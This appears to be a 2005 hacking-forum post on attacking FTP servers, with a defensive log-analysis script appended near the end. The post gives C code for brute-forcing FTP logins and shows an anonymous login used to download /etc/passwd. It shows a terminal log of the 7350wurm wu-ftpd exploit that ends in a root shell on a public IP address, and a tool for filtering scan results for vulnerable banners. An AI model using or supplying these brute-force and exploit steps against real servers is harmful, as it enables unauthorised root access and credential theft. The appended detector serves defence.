
Title: ftp attack

Author: 鱼鱼的梦想    Time: 2005-1-2 16:53     Title: ftp attack

[This post was last edited by 黑色海岸线 on 2005/02/18 06:14am, 1st edit]

Nothing special here really, I'm just taking the old stuff out and writing it up once more. Attacking ftp comes down to nothing more than guessing users and overflowing the ftp server! So let's go over some knowledge you are probably already very familiar with. Guessing user passwords: I think pretty much every scanner has this feature. Always using other people's tools is a bit embarrassing, it feels like living under someone else's roof, I wonder whether you feel the same! And besides, do you understand the process by which a password and user get scanned out? It's really not hard! When you connect to some ftp server with the ftp command on the command line, you can in fact use that to guess passwords too, by hand, but that way is far too slow, so you have to write something yourself to speed it up!

D:\>ftp
ftp>open 192.168.25.1
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0)
User (192.168.25.1:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password: (not echoed)
530 User 111@ cannot log in.
Login failed

The above is an ftp login process. What really happens during login is that ftp sends USER anonymous to the ftp server, which then returns an identifying value, for example the 331 above; after that it waits for you to enter PASS xxxxx, and if that succeeds you are logged in, otherwise you have to retry.

/**************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
......................
int ftp_crack(char *username, char *password, int sock) /* sock is the ftp connection set up with socket */
{
    char *buffer = malloc(1024);
    int found = 0;

    memset(buffer, 0, 1024);
    recv(sock, buffer, 1023, 0);                 /* read the 220 greeting; 1023 keeps the buffer NUL-terminated */
    memset(buffer, 0, 1024);
    sprintf(buffer, "USER %s\r\n", username);    /* write USER into buffer */
    send(sock, buffer, strlen(buffer), 0);       /* send it with send */
    printf("Try username %s \n", username);
    memset(buffer, 0, 1024);
    recv(sock, buffer, 1023, 0);                 /* expect 331 */
    memset(buffer, 0, 1024);
    sprintf(buffer, "PASS %s\r\n", password);
    send(sock, buffer, strlen(buffer), 0);       /* send PASS */
    memset(buffer, 0, 1024);
    recv(sock, buffer, 1023, 0);
    printf("Reply : %s \n", buffer);
    if (strstr(buffer, "incorrect") == NULL) {   /* check whether it succeeded; "incorrect" can be changed to something else, e.g. "failed" for the Windows ftp server */
        printf("\nFound the password %s for user %s\n", password, username);
        found = 1;
    }
    free(buffer);
    return found;
}
..................
/***************************************************************/

The above is a fragment of the code, [full code]; the password check can then be automated!

Something still very common on the net right now is that many ftp servers can be logged into as anonymous or guest. Nothing special in itself, but it can still be used, for example you can use the cwd command to determine users, and on some ftp servers that lack handling for sequences like ..../.../ you can download passwd.

D:\>ftp
ftp> open 192.168.25.3
Connected to 192.168.25.3
220 chi FTP server (version wu-2.6.2.5) ready.
User (192.168.25.3:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password: (I typed anonymous, and got in)
230-The response 'anonymous' is not valid
230-Next time please use your e-mail address as your password
230- for example: joe@192.168.25.1
230 Guest login ok, access restrictions apply.
ftp>cd /etc
250 CWD command successful.
ftp>ls
200 PORT command successful.
550 Bad directory components
ftp>get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
ftp: 84 bytes received in 0.00Seconds 84000.00Kbytes/sec.
ftp>

In the directory on your own machine you will find the passwd file; open it with a text editor and that's it. Most of them look like the following:

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/nonexistent
operator:*:2:20:System &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
pop:*:68:6:Post Office Owner:/nonexistent:/nonexistent
ftp:*:999:999:anonymous ftp account:/home/ftp:/bin/csh
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
joe:*:1001:1001:User &:/home/joe:/bin/csh
norm:*:1000:1000:Norman Rossman:/home/norm:/bin/csh
khan:*:1008:1008:RobRose Net, khans.com, Robert Jenkins:/home/khan:/bin/csh
robrose:*:1056:1056:Robert Jenkins, robrose.com:/home/robrose:/bin/csh
secret:*:1002:1002:Secretoflife.com:/home/secret:/bin/csh

It is shadowed, but that doesn't matter; after all there aren't many machines like this left, and at the very least we know the other side's usernames! Another way of getting usernames is with the cwd command, but that method isn't very feasible.

Next is the overflow of the ftp server; the most common one on the net is the wu-ftp server overflow attack!

Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
login: chi
Password:
Last login: Mon Feb 24 13:25:17 from 192.168.25.1
[chi@chi chi]$ ls
7350wurm  guest.c  openssl-too-open.tar.gz  dsniff-2.3-2.i386.rpm
ncurses4-5.0-5.i386.rpm  sniffit-0.3.7beta-1.i386.rpm  guest  openssl-too-open
[chi@chi chi]$ ./7350wurm
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

usage: ./7350wurm [-h] [-v] [-a] [-D] [-m] [-t ] [-u ] [-p ] [-d host] [-L ] [-A ]

-h this help
-v be verbose (default: off, twice for greater effect)
-a AUTO mode (target from banner)
-D DEBUG mode (waits for keypresses)
-m enable mass mode (use with care)
-t num choose target (0 for list, try -v or -v -v)
-u user username to login to FTP (default: "ftp")
-p pass password to use (default: "mozilla@")
-d dest IP address or fqhn to connect to (default: 127.0.0.1)
-L loc override target-supplied retloc (format: 0xdeadbeef)
-A addr override target-supplied retaddr (format: 0xcafebabe)

[chi@chi chi]$ ./7350wurm -t 0
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

num . description
----+-------------------------------------------------------
1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
2 | Debian potato [wu-ftpd_2.6.0-3.deb]
3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
26 | SuSE 7.0 [wuftpd.rpm]
27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
28 | SuSE 7.1 [wuftpd.rpm]
29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
30 | SuSE 7.2 [wuftpd.rpm]
31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
32 | SuSE 7.3 [wuftpd.rpm]
33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
34 | Slackware 7.1

[chi@chi chi]$ ./7350wurm -a -d 62.163.38.207
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 62.163.38.207 with (ftp/mozilla@) ... failed to connect (user/pass correct?)

[chi@chi chi]$ ./7350wurm -a -d 62.163.35.119
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 62.163.35.119 with (ftp/mozilla@) ... connected.
# banner: 220 odin.bilskirner.net FTP server (Version wu-2.6.1-16.7x.1) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
##################################################
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Linux 2.2.16-3 #1 Mon Jun 19 18:10:14 EDT 2000 i686 unknown
ls -al
total 24
drwxr-xr-x 6 root root 4096 Apr 13 16:14 .
drwxr-xr-x 37 root root 4096 Feb 8 18:23 ..
d--x--x--x 2 root root 4096 Jul 12 2000 bin
d--x--x--x 2 root root 4096 Jul 12 2000 etc
drwxr-xr-x 2 root root 4096 Jul 12 2000 lib
drwxr-sr-x 2 root ftp 4096 Feb 5 2000 pub
.......

As for how to get the other host's banner: you can scan with superscan, scan a fairly large range, scanning only port 21 and showing the host responses. When the scan is done you can look through them one by one, and whenever you see wu-ftp you can go and try it, but personally I found that tiring, so I wrote a little thing that simplifies the superscan results! Just compile it yourself with tc and it's done! [ready-made download]

/***********************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    FILE *in;
    FILE *out;
    char buf[1024];

    if (argc < 3) {
        printf("usage : %s <infile> <outfile>\n", argv[0]);
        exit(1);
    }
    in = fopen(argv[1], "r");
    if (in == NULL) {
        puts("File open error");
        exit(1);
    }
    out = fopen(argv[2], "w");
    if (out == NULL) {
        puts("File write error");
        fclose(in);
        exit(1);
    }
    /* copy every line of the scan output that contains "wu" (a wu-ftpd banner) */
    while (fgets(buf, sizeof buf, in) != NULL) {
        if (strstr(buf, "wu") != NULL)
            fputs(buf, out);
    }
    fclose(in);
    fclose(out);
    return 0;
}
/*****************************************************************************************/
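A defender's view of the two things the post shows, the USER/PASS guessing loop that leaves a run of 530 replies on the server side and an anonymous login that walks to /etc and fetches passwd, written as an added example and not as code from the original post. It assumes a constructed control-channel log format (time, client address, C or S direction, text) and counts 530 replies per client without a time window.

```python
import posixpath
import re
from collections import Counter, defaultdict

# Constructed sample of an FTP control-channel log, one line per client
# command (C) or server reply (S); not a real wu-ftpd or IIS log format.
SAMPLE_LOG = """\
2005-01-02 16:53:02 192.168.25.9 S 530 User 111@ cannot log in
2005-01-02 16:53:03 192.168.25.9 S 530 Login incorrect
2005-01-02 16:53:04 192.168.25.9 S 530 Login incorrect
2005-01-02 16:53:05 192.168.25.9 S 530 Login incorrect
2005-01-02 16:53:06 192.168.25.9 S 530 Login incorrect
2005-01-02 17:10:00 10.0.0.7 C USER anonymous
2005-01-02 17:10:00 10.0.0.7 S 230 Guest login ok
2005-01-02 17:10:03 10.0.0.7 C CWD /etc
2005-01-02 17:10:04 10.0.0.7 C RETR passwd
2005-01-02 17:30:00 10.0.0.8 C USER ftp
2005-01-02 17:30:02 10.0.0.8 C RETR pub/README
"""

LINE_RE = re.compile(r"^\S+ \S+ (\S+) ([CS]) (\S+)(?: (.*))?$")
FAIL_THRESHOLD = 5                           # 530 replies to one client before alerting
GUEST_USERS = {"anonymous", "ftp", "guest"}  # accounts the post says are often open

def analyse(log_text):
    """Return a sorted list of (client, reason) alerts found in the log."""
    alerts, fails = set(), Counter()
    guest, cwd = set(), defaultdict(lambda: "/")
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, direction, verb, arg = m.group(1, 2, 3, 4)
        arg = arg or ""
        if direction == "S":
            # Repeated 530 replies are the server-side trace of a USER/PASS guessing loop.
            fails[client] += 1 if verb == "530" else 0
            if fails[client] >= FAIL_THRESHOLD:
                alerts.add((client, "login failure burst"))
        elif verb == "USER" and arg.lower() in GUEST_USERS:
            guest.add(client)
        elif verb in ("CWD", "RETR"):
            # Resolve against the session's cwd so "CWD /etc" + "RETR passwd" reads as /etc/passwd.
            target = posixpath.normpath(posixpath.join(cwd[client], arg))
            if verb == "CWD":
                cwd[client] = target
            if client in guest and (".." in arg or target.startswith("/etc")):
                alerts.add((client, f"guest {verb} {target}"))
    return sorted(alerts)
```

Both rules are deliberately simple: a real deployment would add a time window to the failure count and take the guest flag from the 230 reply rather than from the USER command alone.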
Author: copyday    Time: 2005-2-18 02:28     Title: ftp attack

Ugh




Welcome to 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2